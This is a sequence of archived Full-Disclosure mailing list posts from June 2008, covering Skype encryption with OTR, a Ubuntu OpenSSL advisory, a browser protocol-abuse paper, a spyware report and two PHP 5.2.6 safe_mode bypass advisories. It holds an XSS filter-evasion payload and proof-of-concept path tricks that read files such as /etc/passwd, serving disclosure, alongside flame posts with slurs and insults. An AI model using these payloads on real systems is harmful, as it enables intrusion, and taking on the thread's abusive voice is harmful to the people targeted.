Re: [Full-disclosure] Skype chat encryption with OTR
Salut, rawket, On Thu, 19 Jun 2008 13:00:49 +1000, rawket wrote: > /There is no denying that an OTR Conversation has been encrypted.. > Its because the private keys change ultra-frequently, and the keys > are short lived that it provides the 'plausible deniability' Not exactly. The plausible deniability is due to the fact that the signature is executed using a symmetric key known to both parties, so that either party (but noone else) could have sent the message. Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33Güterstrasse 86 Fax:+41 61 383 14 674053 Basel Web:www.sygroup.ch [EMAIL PROTECTED] signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Skype chat encryption with OTR
Are you willing to trust skype encryption for your own confidential material? It obviously depend on the risk context and trust scenario. I would never send any confidential material over a skype chat but only over a channel where i have independent control over the information encryption. Would be nice to analyze some approach to make even "voice" of skype end-to-end encrypted with an independent encryption module (applying zrtp or other crypto technologies), even if this one could be much more difficult to be achieved. Cheers Fabio/naif Ureleet wrote: > isnt skype encrypted anyway? > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Skype chat encryption with OTR
Yeah its encrypted, Public AND Private keys are stored on Skype's server. Although this is great, and provides the user with an encrypted conversation (voice or text) wherever he/she is in the world - it means all the keys are stored in 1 location and can be intercepted by either Skype or the feds heh... >> /end-to-end deniable encryption for Skype chat messages. /There is no denying that an OTR Conversation has been encrypted.. Its because the private keys change ultra-frequently, and the keys are short lived that it provides the 'plausible deniability' Even with OTR, theres no need to send your private conversations through skype's servers. You should use OTR with a trusted jabber server. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] xss dot(.) filter evasion
On 18 Jun 08, at 08:49, Thomas Pollet wrote: > I came across this site that implemented some filtering so the dots > were > replaced by an underscore, also the quotes and backslash were escaped. > I came up with the code below to bypass this filtering (write > anything to > the page using String.fromCharCode) > Someone knows a different way to do this? eval makes everything easy. Well, reasonably easy. eval(unescape(String(/%2a%2a%2falert(%22xss%22);%2f%2a%2a/))); ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Coming soon : Firefox 3 Release overflow
is this the "lets set a world record for downloads, oh wait, we forgot to buy the bandwidth to support that" overflow? On Tue, Jun 17, 2008 at 10:20 PM, doulcet pierre <[EMAIL PROTECTED]> wrote: > CRC32 : 898482c7 > MD5 : 801ed54c2ab948472584154ba5bec56e > SHA-1 : 595ab2d95a433c8973d60245cb2b4d3857838605 > SHA-2 256 : > 0c70374063951c9f7eaf26cfe306c1e9773bbd84cb3a1396b3e0b1d633b4498a > > Firefox 3 Release, overflow. > > -- > [EMAIL PROTECTED] > Proof-of-Concept.fr > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Skype chat encryption with OTR
isnt skype encrypted anyway? On Wed, Jun 18, 2008 at 5:11 AM, Fabio Pietrosanti (naif) <[EMAIL PROTECTED]> wrote: > For all you OS X guys that like skype because of it's usability but are > concerned about the lacks of and end-to-end message encryption system (a > plug-in for skype). > > Today i tried: > > #1 Get and install Adium (I suggest portable adium in a separated > filevault volume) >http://www.freesmug.org/portableapps/adium/ > > #2 Get and install Skype plug-in for Adium > http://myjobspace.co.nz/images/pidgin/ > > #3 Enable OTR encryption on Skype chat (trough Adium client) > http://www.cypherpunks.ca/otr/ > > Et voilà, end-to-end deniable encryption for Skype chat messages. > > The funny thing is that you can see the encrypted chat and key exchange > on standard Skype messaging window, so you can verify yourself that all > stuff are enciphered. > > Now i feel myself more comfortable and will sleep +10minutes each night. > > Cheers > > Fabio/naif > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Comments on: Internet-connected coffee maker has security holes
id' love to see n3td3v dos a coffee maker. hell i'd love to see n3td3v dos anything. On Tue, Jun 17, 2008 at 6:14 PM, T Biehn <[EMAIL PROTECTED]> wrote: > When no one was looking, you brewed forty pots of coffee, You brewed > 40 pots of coffee. Thats as many as four tens. > And the Feds know you're terrible. > > On Tue, Jun 17, 2008 at 4:31 PM, n3td3v <[EMAIL PROTECTED]> wrote: >> -- Forwarded message -- >> From: n3td3v <[EMAIL PROTECTED]> >> Date: Tue, Jun 17, 2008 at 9:27 PM >> Subject: Comments on: Internet-connected coffee maker has security holes >> To: n3td3v <[EMAIL PROTECTED]> >> >> >> by n3td3v June 17, 2008 1:22 PM >> >> "This is why connecting everything to the internet is a terrible >> idea." Yeah but the intelligence services love it, they embrace it. >> The amount of information being collected over the internet by them >> has reached an all time high, the intelligence services are in their >> zone with the information collecting capability that's going on. If >> the government didn't like everything connected to the internet, there >> would have been a clamp down long ago, infact the government love the >> internet and hope everything can be internet connected soon. GCHQ and >> NSA will need to build bigger data warehouses to store everything, but >> thats not a draw back for them its an investment when you start to see >> the amount of searchable data being collected about everyone and >> stored on the intelligence services databases that top spies can >> access from anywhere in the world just like consumers can with Google >> search, accept the intelligence services searches don't come up with >> the next train to catch, they come up with the next terrorist to catch >> instead. All the best, n3td3v >> >> http://news.cnet.com/8601-10784_3-9970757.html?communityId=2066&targetCommunityId=2066&messageId=741397#741397 >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast
joel -- i told u not to respond, you didnt listen, damn it.. i dont know how much you know about n3td3v, but he tries to make his own name off of other pplz fame and work. take web application security day. take the day he went off on hd moore. take any day, ever. hes just jumping on your coattails and riding you for all you are worth now. fukin ignore him. n3td3v -- you fuckin douche, get a job. quit trying to ride joels dick like you tried to ride everyone elses on your little web application day (oh by the way, how did that go for you?), or hd moores dick. you dont work for anyone, you dont know shit, you are plainly ranting about whatever and whoever. find some REAL security issues to talk about, and we will gladly participate with you. mi5 doesnt care. you suck. go hang. On Wed, Jun 18, 2008 at 4:26 PM, n3td3v <[EMAIL PROTECTED]> wrote: > On Wed, Jun 18, 2008 at 5:56 PM, Joel Esler <[EMAIL PROTECTED]> wrote: >> On Jun 18, 2008, at 12:26 PM, n3td3v wrote: >> >> Joel Esler said he doesn't switch his phone off on flights and that >> anyone who is on a plane with him should watch out. >> >> First of all, I said "before I got the iPhone with the 'airplane' mode" I'd >> forget to turn off my phone alot, i'd throw it in my briefcase when I'd go >> through security, and forget it's in there. Heck I've seen people actually >> been able to receive calls on their crackberries while in mid flight. Not >> that they answered them. But I've seen the phones ring. I have an iPhone >> now, I place it in airplane mode when I get on a flight. > > Why did you tell people to be careful when you're on a flight? Does > that mean you're planning to fly again with your device turned on and > that you suspect it will mess with the planes electronics? > >> There are actually studies going on RIGHT NOW to see if phones can be >> allowed to be used during flights by the FCC/FAA, and in other countries as >> well. > > I hope they consider this incident before making up their mind... > > They (experts) suspect a radio frequency messed with the electronics, > one that was being used by MI5 to block mobile phone signals. > > "An offical probe into the Heathrow crash has focused on the high-tech > jamming device which shields Gordon Brown from terrorist attack. > > When the Boeing 777 crashed on January 17 it passed just feet above > the Prime Minister's official car as he was driven to the airport to > board a flight to Beijing. > > Inside the car is a jammer which broadcasts radio signals 100 times > more powerful than a mobile phone. > > The device is designed to block signals which MI5 say terrorists use > to blow up remote-control bombs." > > http://www.sundaymirror.co.uk/news/sunday/2008/04/27/gordon-bown-in-a-jam-98487-20396286/ > > "WASHINGTON — A total electronics failure reportedly occurred before > the crash of a British Airways 777 at London's Heathrow Airport on > Thursday (Jan. 17). > All 136 passengers and 16 crew members escaped from the British > Airways flight from Beijing. The BBC reported that 13 passengers were > injured. > > An airport worker told the BBC that the pilot of the Boeing 777 lost > all power, and had to glide the plane to a landing. The plane's > landing gear collapsed after crash landing. > > The BBC said the airport worker was told by the pilot that all > aircraft electronics had failed and that the crew had no warning of a > problem. "It just went," the worker was quoted as saying. "It's a > miracle. The [pilot] deserves a medal as big as a frying pan." > > http://www.eetimes.com/news/latest/showArticle.jhtml?articleID=205900406 > > "Computer glitch:This happened with a Malaysian Airlines 777 and a > former 777 captain told The Sunday Times that for both engines to fail > at the same time "it has got to be commanded" - ie, it was computer > error in controlling the engines. Verdict: possible and many experts' > prime concern " > > http://www.timesonline.co.uk/tol/news/uk/article3216746.ece > > "The British Airways plane that crash landed at Heathrow today was a > Boeing 777 - currently regarded as the safest aeroplane in the world > by aviation experts. > > The plane has only been in use for seven years and is the first > aircraft of its kind to have been designed by computers and boasts the > latest "avionic and navigational systems". > > The Boeing 777 has a number of variant models - such as the 777-200ER > and 777-300ER - but all the models being flown around the world > currently have a clean safety record." > > http://www.dailymail.co.uk/news/article-508869/Boeing-777-crash-landed-Heathrow-safest-aeroplanes-world-say-experts.html > >> Personally I hope this doesn't go through, as I don't want to be sitting >> next to some dude during my 100,000+ miles I fly a year to hear yacking the >> whole flight. >> > > I'd be more concerned about terrorists using the phone to trigger some > kind of security vulnerability with the planes electronics than having > my sleep disturbed by a s
[Full-disclosure] Fwd: fag
what a serious researcher. -- Forwarded message -- From: n3td3v <[EMAIL PROTECTED]> Date: Wed, Jun 18, 2008 at 5:48 PM Subject: fag To: Ureleet <[EMAIL PROTECTED]> you're such a wee pubic hair that no one is listening to and who i won't respond to in public mailing lists anymore. your hay day is over cock sucker, you ain't getting anymore public responses from me. all the best, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The Extended HTML Form attack revisited
Hi, Just thought I'd let you know that Wade Alcorn wrote a similar paper in 2006: http://www.bindshell.net/papers/ipc (Using IMAP3 too), but of course things have changed since then (namely this attack not working against Firefox 2 or 3). Also, there is a complete list of ports that Firefox blocks here: http://www.mozilla.org/projects/netlib/PortBanning.html (which Wade's paper references), and the default protocol handlers which can speak to the blocked ports. Do you know if there's a list of ports published by Microsoft/Opera/Apple about which ports are blocked in their browsers? If not, would you be able to publish the ports you found blocked in an appendix (I'm sure it wouldn't be too much code to whip up to test it, but if you've already done so then there's no point in duplicating work)? I also did some digging myself and found that the reason Firefox doesn't render the response as HTML is because it searches for the string "http" (case-insensitive, no quotes) in the first 8 bytes of the response; if you can satisfy that condition somehow then you can still get it to happen, but of course that seems pretty unlikely. IE also tries to search for a string, in this case "http/" (case-insensitive, no quotes) in the first 1024 bytes, but only so that it can identify http headers, so if you can inject data into the first 1024 bytes of the response you can inject headers to do cache poisoning, etc. (You can probably do header injection against Firefox if you can trigger this, but the problem is of course triggering it on FIrefox) - kuza55 2008/6/19 Sandro Gauci <[EMAIL PROTECTED]>: > Hi - > > Back in 2002 I had published details of a vulnerability affecting most > web browsers. It detailed a security flaw that allows attackers to > abuse non-HTTP protocols to launch Cross Site Scripting attacks even > when a target web application was not vulnerable to XSS. > > Six years later I'm releasing an update to this research in this > paper. This security vulnerability still affects popular web browsers > nowadays and the following browsers were tested as vulnerable: > > * Internet Explorer 6 > * Internet Explorer 7 > * Internet Explorer 8 (beta 1) > * Opera 9.27 > * Opera 9.50 > * Safari 1.32 > * Safari 3.1.1 > > Others have described how to abuse behavior for purposes other than > Cross Site Scripting. NGSSoftware previously published a paper called > "Inter-Protocol Exploitation" which references the original EyeonSecurity > paper. > > Paper at: > http://resources.enablesecurity.com/resources/the%20extended%20html%20form%20attack%20revisited.pdf > > or http://tinyurl.com/5d88ll > > -- > Sandro Gauci > EnableSecurity > Web: http://enablesecurity.com/ > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-612-11] openssl-blacklist update
=== Ubuntu Security Notice USN-612-11 June 18, 2008 openssl-blacklist update http://www.ubuntu.com/usn/usn-612-1 http://www.ubuntu.com/usn/usn-612-3 http://www.ubuntu.com/usn/usn-612-8 http://www.ubuntu.com/usn/usn-612-9 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: openssl-blacklist 0.3.3+0.4-0ubuntu0.6.06.2 openssl-blacklist-extra 0.3.3+0.4-0ubuntu0.6.06.2 Ubuntu 7.04: openssl-blacklist 0.3.3+0.4-0ubuntu0.7.04.2 openssl-blacklist-extra 0.3.3+0.4-0ubuntu0.7.04.2 Ubuntu 7.10: openssl-blacklist 0.3.3+0.4-0ubuntu0.7.10.2 openssl-blacklist-extra 0.3.3+0.4-0ubuntu0.7.10.2 Ubuntu 8.04 LTS: openssl-blacklist 0.3.3+0.4-0ubuntu0.8.04.3 openssl-blacklist-extra 0.3.3+0.4-0ubuntu0.8.04.3 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-612-3 addressed a weakness in OpenSSL certificate and key generation and introduced openssl-blacklist to aid in detecting vulnerable certificates and keys. This update adds RSA-4096 blacklists to the openssl-blacklist-extra package and adjusts openssl-vulnkey to properly handle RSA-4096 and higher moduli. Original advisory details: A weakness has been discovered in the random number generator used by OpenSSL on Debian and Ubuntu systems. As a result of this weakness, certain encryption keys are much more common than they should be, such that an attacker could guess the key through a brute-force attack given minimal knowledge of the system. This particularly affects the use of encryption keys in OpenSSH, OpenVPN and SSL certificates. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.6.06.2.dsc Size/MD5: 676 ec900c22df66e7da2543082d7123aed7 http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.6.06.2.tar.gz Size/MD5: 32928890 ff8a69186860a3c9bc78c86b51993154 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist-extra_0.3.3+0.4-0ubuntu0.6.06.2_all.deb Size/MD5: 6317974 c71f0e9dfaf87712672fb52acb55db0d http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.6.06.2_all.deb Size/MD5: 6333018 e43b4ea20935655041e803064cee6626 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.04.2.dsc Size/MD5: 812 71e900154130bd20b4401b6ac2653cdc http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.04.2.tar.gz Size/MD5: 32928996 37d24b96159aca653515a8aa136f31d3 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist-extra_0.3.3+0.4-0ubuntu0.7.04.2_all.deb Size/MD5: 6318082 cc4e2c235c71d36653ce1c2ef1b247bc http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.04.2_all.deb Size/MD5: 6332858 d805a05a0bc674c064256cf26f231881 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.10.2.dsc Size/MD5: 812 b62d9f57a2c6f4e3e671a3d9648b1df1 http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.10.2.tar.gz Size/MD5: 32928995 8717c32922e43aaaf7203ccd268b99a8 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist-extra_0.3.3+0.4-0ubuntu0.7.10.2_all.deb Size/MD5: 6318232 81e856d987468e3fc3a0d6e7e21bf532 http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.10.2_all.deb Size/MD5: 6332724 84087c5b3d5a05cf55d415adaf6974f1 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.8.04.3.dsc Size/MD5: 943 c1d37d2d4a36ba178022fc27ff6a0bdc http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.8.04.3.tar.gz Size/MD5: 32929040 376d57551e6859b39c2e795284978233 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/open
Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast
On Wed, Jun 18, 2008 at 5:56 PM, Joel Esler <[EMAIL PROTECTED]> wrote: > On Jun 18, 2008, at 12:26 PM, n3td3v wrote: > > Joel Esler said he doesn't switch his phone off on flights and that > anyone who is on a plane with him should watch out. > > First of all, I said "before I got the iPhone with the 'airplane' mode" I'd > forget to turn off my phone alot, i'd throw it in my briefcase when I'd go > through security, and forget it's in there. Heck I've seen people actually > been able to receive calls on their crackberries while in mid flight. Not > that they answered them. But I've seen the phones ring. I have an iPhone > now, I place it in airplane mode when I get on a flight. Why did you tell people to be careful when you're on a flight? Does that mean you're planning to fly again with your device turned on and that you suspect it will mess with the planes electronics? > There are actually studies going on RIGHT NOW to see if phones can be > allowed to be used during flights by the FCC/FAA, and in other countries as > well. I hope they consider this incident before making up their mind... They (experts) suspect a radio frequency messed with the electronics, one that was being used by MI5 to block mobile phone signals. "An offical probe into the Heathrow crash has focused on the high-tech jamming device which shields Gordon Brown from terrorist attack. When the Boeing 777 crashed on January 17 it passed just feet above the Prime Minister's official car as he was driven to the airport to board a flight to Beijing. Inside the car is a jammer which broadcasts radio signals 100 times more powerful than a mobile phone. The device is designed to block signals which MI5 say terrorists use to blow up remote-control bombs." http://www.sundaymirror.co.uk/news/sunday/2008/04/27/gordon-bown-in-a-jam-98487-20396286/ "WASHINGTON — A total electronics failure reportedly occurred before the crash of a British Airways 777 at London's Heathrow Airport on Thursday (Jan. 17). All 136 passengers and 16 crew members escaped from the British Airways flight from Beijing. The BBC reported that 13 passengers were injured. An airport worker told the BBC that the pilot of the Boeing 777 lost all power, and had to glide the plane to a landing. The plane's landing gear collapsed after crash landing. The BBC said the airport worker was told by the pilot that all aircraft electronics had failed and that the crew had no warning of a problem. "It just went," the worker was quoted as saying. "It's a miracle. The [pilot] deserves a medal as big as a frying pan." http://www.eetimes.com/news/latest/showArticle.jhtml?articleID=205900406 "Computer glitch:This happened with a Malaysian Airlines 777 and a former 777 captain told The Sunday Times that for both engines to fail at the same time "it has got to be commanded" - ie, it was computer error in controlling the engines. Verdict: possible and many experts' prime concern " http://www.timesonline.co.uk/tol/news/uk/article3216746.ece "The British Airways plane that crash landed at Heathrow today was a Boeing 777 - currently regarded as the safest aeroplane in the world by aviation experts. The plane has only been in use for seven years and is the first aircraft of its kind to have been designed by computers and boasts the latest "avionic and navigational systems". The Boeing 777 has a number of variant models - such as the 777-200ER and 777-300ER - but all the models being flown around the world currently have a clean safety record." http://www.dailymail.co.uk/news/article-508869/Boeing-777-crash-landed-Heathrow-safest-aeroplanes-world-say-experts.html > Personally I hope this doesn't go through, as I don't want to be sitting > next to some dude during my 100,000+ miles I fly a year to hear yacking the > whole flight. > I'd be more concerned about terrorists using the phone to trigger some kind of security vulnerability with the planes electronics than having my sleep disturbed by a single mom or retired couple muttering away on the phone. I think all gadgets and gizmos should be banned from flights incase of 0-day vulnerabilities that are unknown about and cause a system failure. > Is this some kind of dry american humour that i'm missing here or is > that not even funny? > > yes, It was a joke. Sorry if it was in bad taste. > If it was just a joke in a bar then it might be funny, it was a joke during a Sans internet storm center podcast on a segment about bluetooth vulnerabilities, and you and your co-workers were just laughing and a joking like you were in a bar about leaving your phone on and telling people to be careful if they were on the same flight as you. Even if I overheard you telling that joke in a bar I would probably walk over and question you about it, or possibly just call the police. If you had made the same joke at the airport terminal and an airport official overheard you, in Britian you would have been arrested by anti-terrorism police... I don
[Full-disclosure] spyware in smplayer_portable.exe found in MPUI.2008-06-16.Full-Package.exe ?
hi there lord_mulder, i wanted to report some spyware like behavior about smplayer_portable.exe i have just downloaded MPUI.2008-06-16.Full-Package.exe from http://mulder.dummwiedeutsch.de/home/?page=projects#mplayer and installed it completely - codecs + mplayer + smplayer on running smplayer_portable.exe it tries to connect to the internet in this host rautemusik.g24m.net without me opening any file like internet radio station or anything else is this behavior normal ? if yes then please tell me what data is rautemusik.g24m.net gathering from my computer ? please investigate this - perhaps the smplayer_portable.exe that you got is infected with some kind of spyware can you please tell me where did you get your version of smplayer_portable.exe that you included in MPUI.2008-06-16.Full-Package.exe ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.2.6 chdir(), ftok() (standard ext) safe_mode bypass
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ] Author: Maksymilian Arciemowicz (cXIb8O3) securityreason.com Date: - - Written: 10.05.2008 - - Public: 17.06.2008 SecurityReason Research SecurityAlert Id: 55 CVE: CVE-2008-2666 CWE: CWE-264 SecurityRisk: Medium Affected Software: PHP 5.2.6 Advisory URL: http://securityreason.com/achievement_securityalert/55 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. chdir ? Change directory SYNOPSIS: bool chdir ( string $directory ) http://pl.php.net/manual/en/function.chdir.php ftok ? Convert a pathname and a project identifier to a System V IPC key SYNOPSIS: int ftok ( string $pathname , string $proj ) http://pl.php.net/manual/en/function.ftok.php !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS - --- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass --- Let's see to chdir() function - --- PHP_FUNCTION(chdir) { char *str; int ret, str_len; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) { RETURN_FALSE; } if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) { RETURN_FALSE; } ret = VCWD_CHDIR(str); if (ret != 0) { php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno); RETURN_FALSE; } RETURN_TRUE; } - --- str is beeing checked by safe_mode example: - --- Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8 - --- in current directory, we should create subdir "http:". => it is possible to create chdir("http://../../../../../../";) and we are in / Why? TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC))) for str="http://../../../../../../"; safe_mode will ignore all paths with http:// that same situation with ftok() function (and more) - ---EXAMPLE1--- cxib# cat /www/wufff.php cxib# ls -la /www/wufff.php - -rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php cxib# php /www/wufff.php /www Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3 /www cxib# - ---/EXAMPLE1--- - ---EXAMPLE2--- cxib# ls -la /www/wufff.php - -rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php cxib# ls -la /www/http: total 8 drwxr-xr-x 2 www www 512 Jun 17 17:12 . drwxr-xr-x 19 www www 4608 Jun 17 17:13 .. cxib# cat /www/wufff.php http://../../etc/";); echo getcwd()."\n"; ?> cxib# php /www/wufff.php /www /etc cxib# - ---/EXAMPLE2--- !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LISTS ALL VULNERABLE FUNCTIONS - --- 2. How to fix --- Do not use safe_mode as a main safety - --- 3. Greets --- sp3x Infospec schain p_e_a Chujwamwdupe - --- 4. Contact --- Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: cxib [at] securityreason [dot] com GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.4 (FreeBSD) iD8DBQFIWCCbW1OhNJH6DMURAsNnAJsEVuvHigC9EZfcg0hhFtlXJsaCMQCgl0w9 W6fcb5TR6GxN9osji+wQCqM= =tyyL -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.2.6 posix_access() (posix ext) safe_mode bypass
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.6 posix_access() (posix ext) safe_mode bypass ] Author: Maksymilian Arciemowicz (cXIb8O3) SecurityReason.com Date: - - Written: 10.05.2008 - - Public: 17.06.2008 SecurityReason Research SecurityAlert Id: 54 CVE: CVE-2008-2665 CWE: CWE-264 SecurityRisk: Low Affected Software: PHP 5.2.6 Advisory URL: http://securityreason.com/achievement_securityalert/54 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. posix_access ? Determine accessibility of a file SYNOPSIS: bool posix_access ( string $file [, int $mode ] ) http://pl2.php.net/manual/pl/function.posix-access.php !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS - --- 1. PHP 5.2.6 posix_access() safe_mode bypass --- Let's see to posix_access() function - --- PHP_FUNCTION(posix_access) { long mode = 0; int filename_len, ret; char *filename, *path; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &filename, &filename_len, &mode) == FAILURE) { RETURN_FALSE; } path = expand_filepath(filename, NULL TSRMLS_CC); if (!path) { POSIX_G(last_error) = EIO; RETURN_FALSE; } if (php_check_open_basedir_ex(path, 0 TSRMLS_CC) || (PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS { efree(path); POSIX_G(last_error) = EPERM; RETURN_FALSE; } ret = access(path, mode); efree(path); if (ret) { POSIX_G(last_error) = errno; RETURN_FALSE; } RETURN_TRUE; } - --- var_dump(posix_access("http://../../../etc/passwd";))==True var_dump(posix_access("/etc/passwd"))==False Why? Because path = expand_filepath(filename, NULL TSRMLS_CC); will change "http://../../../etc/passwd"; to path=/etc/passwd (PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS))) will check realy path "http://../../../etc/passwd";. http:// is using in php_checkuid_ex(), so safe_mode is bypassed. !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS - --- 2. How to Fix --- Do not use safe_mode as a main safety - --- 3. Greets --- sp3x Infospec schain p_e_a Chujwamwdupe - --- 4. Contact --- Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: cxib [at] securityreason [dot] com GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.4 (FreeBSD) iD8DBQFIWCC+W1OhNJH6DMURAsq4AJ0eC1qKOZVOJJB3XDRIhpufNe1qUwCfTWv0 n4Sg31DePRpr4h3PLouKFoA= =6qwD -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] xss dot(.) filter evasion
